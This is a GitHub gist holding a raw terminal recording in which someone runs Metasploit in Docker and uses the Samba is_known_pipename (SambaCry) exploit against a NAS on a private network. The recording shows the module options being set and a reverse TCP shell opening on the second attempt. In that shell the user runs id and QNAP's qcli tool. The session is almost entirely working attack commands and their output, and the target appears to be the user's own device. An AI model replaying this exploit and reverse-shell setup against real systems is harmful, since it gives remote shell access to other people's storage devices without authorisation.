Created
May 26, 2017 16:42
-
-
Save chihchun/506d851499b3571bf7f3f1b4134efed4 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 命令稿啟動於 2017年05月27日 (週六) 00時39分12秒 | |
| $ : 1495816752:0;script.sh [C[C[C[C[C[C[C[C[C[C[C[C34:0;docker run -t -i --rm -p 4444:4444 kali-metasploit:trunk [C[C[1P[1P[1P[1P[1P[1P[1P[1P[1P[1P[1P[1P[1P[1P[1P^C | |
| $ | |
| $ | |
| $ | |
| $ | |
| $ docker run -t -i --rm -p 4444:4444 kali-metasploit:trunk | |
| [*] Starting the Metasploit Framework console.../ [*] Starting the Metasploit Framework console...- [*] Starting the Metasploit Framework console...\ [*] starting the Metasploit Framework console...| [*] STarting the Metasploit Framework console.../ [*] StArting the Metasploit Framework console...- [*] StaRting the Metasploit Framework console...\ [*] StarTing the Metasploit Framework console...| [*] StartIng the Metasploit Framework console.../ [*] StartiNg the Metasploit Framework console...- [*] StartinG the Metasploit Framework console...\ [*] Starting the Metasploit Framework console...| [*] Starting The Metasploit Framework console.../ [*] Starting tHe Metasploit Framework console...- [*] Starting thE Metasploit Framework console...\ [*] Starting the Metasploit Framework console...| [*] Starting the metasploit Framework console.../ [*] Starting the MEtasploit Framework console...- [*] Starting the MeTasploit Framework console...\ [*] Starting the MetAsploit Framework console...| [*] Starting the MetaSploit Framework console.../ [*] Starting the MetasPloit Framework console...- [*] Starting the MetaspLoit Framework console...\ [*] Starting the MetasplOit Framework console...| [*] Starting the MetasploIt Framework console.../ [*] Starting the MetasploiT Framework console...- [*] Starting the Metasploit Framework console...\ [*] Starting the Metasploit framework console...| [*] Starting the Metasploit FRamework console.../ [*] Starting the Metasploit FrAmework console...- [*] Starting the Metasploit FraMework console...\ [*] Starting the Metasploit FramEwork console...| [*] Starting the Metasploit FrameWork console.../ [*] Starting the Metasploit FramewOrk console...- [*] Starting the Metasploit FramewoRk console...\ [*] Starting the Metasploit FrameworK console...| [*] Starting the Metasploit Framework console.../ [*] Starting the Metasploit Framework Console...- [*] Starting the Metasploit Framework cOnsole...\ [*] Starting the Metasploit Framework coNsole...| [*] Starting the Metasploit Framework conSole.../ [*] Starting the Metasploit Framework consOle...- [*] Starting the Metasploit Framework consoLe...\ [*] Starting the Metasploit Framework consolE...| [*] Starting the Metasploit Framework console.../ [*] Starting the Metasploit Framework console...- [*] Starting the Metasploit Framework console...\ [*] Starting the Metasploit Framework console...| [*] Starting the Metasploit Framework console.../ [*] Starting the Metasploit Framework console...- [*] Starting the Metasploit Framework console...\ [*] starting the Metasploit Framework console...| [*] STarting the Metasploit Framework console.../ [*] StArting the Metasploit Framework console...- [*] StaRting the Metasploit Framework console...\ [*] StarTing the Metasploit Framework console...| | |
| [0m[36m[0m[1m[31m | |
| .,,. . | |
| .\$$$$$L..,,==aaccaacc%#s$b. [37md[32m8, [37md8[32mP | |
| [37md8[36mP [31m#$$$$$$$$$$$$$$$$$$$$$$$$$$$b. [37m`BP d88[32m8888p | |
| [37md[36m888888P [31m'7$$$$\""""''^^`` .7$$$|D*"'``` [37m?[32m88' | |
| [37md8[36mbd8b.d8p [37md8[36m888b [37m?[36m88' [37md88[36m8b8b[31m _.os#$|8*"` [37md8[32mP [37m?8[32mb 88P | |
| [37m8[36m8P`?P'?P [37md8[36mb_,dP 88P [37md8[36mP' ?88[31m .oaS###S*"` [37md8[32mP [37md88[32m88b $whi?[32m88b 88b | |
| [36md88 d8 ?8 88b [37m8[36m8b 88b ,88b [31m.osS$$$$*" [32m?88,.d88b, [37md[32m88 [37md[32m8P' ?88 88P `?8b | |
| [36md88' d88b 8b`?8888P'`?8b`?88P'[31m.aS$$$$Q*"` [32m`?88' ?88 ?88 88b d88 d88[31m | |
| .a#$$$$$$"` [32m88b d8P 88b`?8888P'[31m | |
| ,s$$$$$$$"` [32m888888P' 88n[31m _.,,,ass;: | |
| .a$$$$$$$P` [32md88P'[31m .,.ass%#S$$$$$$$$$$$$$$' | |
| .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' | |
| ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' | |
| .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' | |
| [37m___________[0m_____________________________[1m[30m_______________________[31m ,&$$$$$$'[30m_____[31m | |
| ll&&$$$$' | |
| .;;lll&&&&' | |
| ...;;lllll&' | |
| ......;;;llll;;;.... | |
| ` ......;;;;... . . | |
| [0m | |
| =[ [33mmetasploit v4.14.22-dev-2835c165d7[0m ] | |
| + -- --=[ 1658 exploits - 947 auxiliary - 293 post ] | |
| + -- --=[ 486 payloads - 40 encoders - 9 nops ] | |
| + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] | |
| [4mmsf[0m [0m> use exploit/linux/samba/is_known_pipename | |
| [0m[4mmsf[0m exploit([1m[31mis_known_pipename[0m) [0m> set RHOST 10.11.12.227 | |
| [0mRHOST => 10.11.12.227 | |
| [4mmsf[0m exploit([1m[31mis_known_pipename[0m) [0m> set LHOST 10.11.12.237 | |
| [0mLHOST => 10.11.12.237 | |
| [4mmsf[0m exploit([1m[31mis_known_pipename[0m) [0m> set SMB_SHARE_BASE /share/CACHEDEV1_DATA/torrent | |
| [0mSMB_SHARE_BASE => /share/CACHEDEV1_DATA/torrent | |
| [4mmsf[0m exploit([1m[31mis_known_pipename[0m) [0m> show optinos | |
| [0m[1m[31m[-][0m Invalid parameter "optinos", use "show -h" for more information | |
| [4mmsf[0m exploit([1m[31mis_known_pipename[0m) [0m> show option | |
| [0m[1m[31m[-][0m Invalid parameter "option", use "show -h" for more information | |
| [4mmsf[0m exploit([1m[31mis_known_pipename[0m) [0m> show options | |
| [0m | |
| Module options (exploit/linux/samba/is_known_pipename): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| RHOST 10.11.12.227 yes The target address | |
| RPORT 445 yes The SMB service port (TCP) | |
| SMB_FOLDER no The directory to use within the writeable SMB share | |
| SMB_SHARE_BASE /share/CACHEDEV1_DATA/torrent no The remote filesystem path correlating with the SMB share name | |
| SMB_SHARE_NAME no The name of the SMB share containing a writeable directory | |
| Exploit target: | |
| Id Name | |
| -- ---- | |
| 1 Linux x86_64 | |
| [4mmsf[0m exploit([1m[31mis_known_pipename[0m) [0m> exploit | |
| [0m | |
| [1m[34m[*][0m Started reverse TCP handler on 172.17.0.2:4444 | |
| [1m[34m[*][0m 10.11.12.227:445 - Using location \\10.11.12.227\torrent\ for the path | |
| [1m[34m[*][0m 10.11.12.227:445 - Hunting for payload using common path names: SgrCKKfK.so - //10.11.12.227/torrent/ | |
| [1m[34m[*][0m 10.11.12.227:445 - Trying location /share/CACHEDEV1_DATA/torrent/SgrCKKfK.so... | |
| [1m[34m[*][0m Exploit completed, but no session was created. | |
| [4mmsf[0m exploit([1m[31mis_known_pipename[0m) [0m> exploitshow options | |
| [0m | |
| Module options (exploit/linux/samba/is_known_pipename): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| RHOST 10.11.12.227 yes The target address | |
| RPORT 445 yes The SMB service port (TCP) | |
| SMB_FOLDER no The directory to use within the writeable SMB share | |
| SMB_SHARE_BASE /share/CACHEDEV1_DATA/torrent no The remote filesystem path correlating with the SMB share name | |
| SMB_SHARE_NAME no The name of the SMB share containing a writeable directory | |
| Payload options (generic/shell_reverse_tcp): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| LHOST 172.17.0.2 yes The listen address | |
| LPORT 4444 yes The listen port | |
| Exploit target: | |
| Id Name | |
| -- ---- | |
| 1 Linux x86_64 | |
| [4mmsf[0m exploit([1m[31mis_known_pipename[0m) [0m> show options[P[P[P[P[Pexploitshow options[Knoset SMB_SHARE_BASE /share/CACHEDEV1_DATA/torrent [C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[P[P[P[P[P[P[P[P[P[P[P[P[P[P[P[P[P[P[P[P[P[P[P[P[P[PLHOST 10.11.12.237RHOST 10.11.12.227LHOST 10.11.12.237 | |
| [0mLHOST => 10.11.12.237 | |
| [4mmsf[0m exploit([1m[31mis_known_pipename[0m) [0m> set LHOST 10.11.12.237[P[P[P[P[P[P[P[P[P[Phow options | |
| [0m | |
| Module options (exploit/linux/samba/is_known_pipename): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| RHOST 10.11.12.227 yes The target address | |
| RPORT 445 yes The SMB service port (TCP) | |
| SMB_FOLDER no The directory to use within the writeable SMB share | |
| SMB_SHARE_BASE /share/CACHEDEV1_DATA/torrent no The remote filesystem path correlating with the SMB share name | |
| SMB_SHARE_NAME no The name of the SMB share containing a writeable directory | |
| Payload options (generic/shell_reverse_tcp): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| LHOST 10.11.12.237 yes The listen address | |
| LPORT 4444 yes The listen port | |
| Exploit target: | |
| Id Name | |
| -- ---- | |
| 1 Linux x86_64 | |
| [4mmsf[0m exploit([1m[31mis_known_pipename[0m) [0m> show optionset LHOST 10.11.12.237[P[P[P[P[P[P[P[P[P[Phow options[P[P[P[P[Pexploit | |
| [0m | |
| [1m[31m[-][0m Handler failed to bind to 10.11.12.237:4444:- - | |
| [1m[34m[*][0m Started reverse TCP handler on 0.0.0.0:4444 | |
| [1m[34m[*][0m 10.11.12.227:445 - Using location \\10.11.12.227\torrent\ for the path | |
| [1m[34m[*][0m 10.11.12.227:445 - Hunting for payload using common path names: ouQlgeuC.so - //10.11.12.227/torrent/ | |
| [1m[34m[*][0m 10.11.12.227:445 - Trying location /share/CACHEDEV1_DATA/torrent/ouQlgeuC.so... | |
| [1m[34m[*][0m Command shell session 1 opened (172.17.0.2:4444 -> 10.11.12.227:59752) at 2017-05-26 16:40:58 +0000 | |
| [0mid | |
| uid=65534(guest) gid=0(administrators) groups=65534(guest),760426308 | |
| qcli | |
| /bin/sh: line 2: qcli: command not found | |
| /sbin/qcli | |
| Fail to lock log file! | |
| : Permission denied | |
| Fail to lock log file! | |
| : Permission denied | |
| -v --version, display the version of QCLI and exit. | |
| -h --help, print this help. | |
| -l --login, login to check authentication. | |
| qcli_admin, admin operations. | |
| qcli_volume, volume operations. | |
| qcli_pool, pool operations. | |
| qcli_raid, RAID operations. | |
| qcli_hdd, HDD operations. | |
| qcli_cache, cache operations. | |
| qcli_iscsi, iSCSI operations. | |
| qcli_iscsiacl, iSCSI ACL operations. | |
| qcli_iscsibackup, iSCSI backup operations. | |
| qcli_virtualdisk, virtual disk operations. | |
| qcli_power, power operations. | |
| qcli_network, network operations. | |
| qcli_log, log operations. | |
| qcli_backuprestore, backup/restore operations. | |
| qcli_firmwareupdate, firmware update operations. | |
| qcli_sharedfolder, shared folder operations. | |
| qcli_quota, quota operations. | |
| qcli_networkservice, network service operations. | |
| qcli_encrypt, encrypt operations. | |
| qcli_rsyncserver, rsync server operations. | |
| qcli_rtrrserver, rtrr server operations. | |
| qcli_timemachine, time machine operations. | |
| qcli_nastonas, nas to nas operations. | |
| qcli_rsync, rsync operations. | |
| qcli_rtrr, rtrr operations. | |
| qcli_networkrecyclebin, network recycle bin operations. | |
| qcli_timezone, time zone operations. | |
| qcli_domainsecurity, domain security operations. | |
| qcli_wifi, wifi operations. | |
| qcli_users, users operations. | |
| qcli_usergroups, usergroups operations. | |
| qcli_ntp, NTP service operations. | |
| qcli_hardware, hardware operations. | |
| qcli_systemstatus, system status operations. | |
| qcli_externaldevice, external device operations. | |
| qcli_mysqlserver, mysqlserver operations. | |
| qcli_volumesnapshot, volume snapshot operations. | |
| qcli_iscsisnapshot, iSCSI snapshot operations. | |
| qcli_domaincontroller, domain controller operations. | |
| qcli_snapreplica, SnapReplica operations. | |
| qcli_snapshotvault, Snapshot Vault operations. | |
| qcli_vjbod, Virtual JBOD operations. | |
| QCLI 4.3.3 20170516, QNAP Systems, Inc. | |
| exit | |
| [1m[34m[*][0m 10.11.12.227 - Command shell session 1 closed. Reason: Died from EOFError | |
| [4mmsf[0m exploit([1m[31mis_known_pipename[0m) [0m> exit | |
| [0m$ exit |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment